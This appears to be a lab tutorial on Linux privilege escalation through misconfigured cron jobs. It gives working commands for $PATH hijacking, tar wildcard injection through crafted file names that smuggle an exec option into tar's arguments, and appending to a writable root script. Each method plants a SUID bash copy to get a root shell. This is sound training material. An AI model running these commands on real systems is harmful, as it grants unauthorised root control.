Cron Jobs

/etc/crontab

What are Cron Jobs?

In Linux, scheduled tasks are called cron jobs. Cronjobs are defined in /etc/crontab (cron table). If we are able to write malicious payload to a script that is executed automatically every minute or so, then this payload will be triggered as root because of the cronjob.

Enumeration

Enumerate crontab:

cat /etc/crontab

For example:

crontab

Here five asterisks means "every minute of every day of every week of every month, that command runs", hence overwrite.sh and /usr/local/bin/compress.sh will be executed every minute.

If we don't have permission to read /etc/crontab, pspy can help us identify scheduled tasks as well.

Method 1: Cron Path

Recall the crontab:

crontab

Note that overwrite.sh is executed using relative path and the $PATH variable is:

/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

If we create a malicious overwrite.sh in /home/user, then this malicious script will be executed as cronjob.

Create a malicious overwrite.sh in /home/user:

echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/overwrite.sh

Don't forget to give it permission:

chmod +x overwrite.sh

Wait a moment until you believe that this script gets executed. Try getting a root shell:

/tmp/bash -p

Method 2: Cron Wildcard

Recall the crontab:

crontab

Examine the content of /usr/local/bin/compress.sh:

/usr/local/bin/compress.sh

Notice the wildcard used by tar. This script intends to backup the /home/user directory. Here we can store a privesc payload in /home/user/runme.sh and use tar injection to let cronjob execute the following command:

tar czf /tmp/backup.tar.gz --checkpoint=1 --checkpoint-action=exec=sh\ runme.sh 

Create a privesc payload /home/user/runme.sh:

echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/runme.sh

Give it permission:

chmod +x /home/user/runme.sh

Prepare tar injection part 1:

touch /home/user/--checkpoint=1

Prepare tar injection part 2:

touch /home/user/--checkpoint-action=exec=sh\ runme.sh

Wait a moment until you believe that this script gets executed. Try getting a root shell:

/tmp/bash -p

Method 3: Cron File Overwrite

Recall the crontab:

crontab

Examine its permission:

Permission

Since this script is owned by root and it is executable, we can simply append a privesc payload (or reverse shell payload) to this file and wait for cronjob to execute it.

Ovewrite /usr/local/bin/overwrite.sh with a privesc payload:

echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> /usr/local/bin/overwrite.sh

Wait a moment until you believe that this script gets executed. Try getting a root shell:

/tmp/bash -p

Challenge: TryHackMe - CMesS

https://www.ctfwriteup.com/tryhackme/tcm-linux-privesc-course/cmess-mediumwww.ctfwriteup.com

TryHackMe - CMesS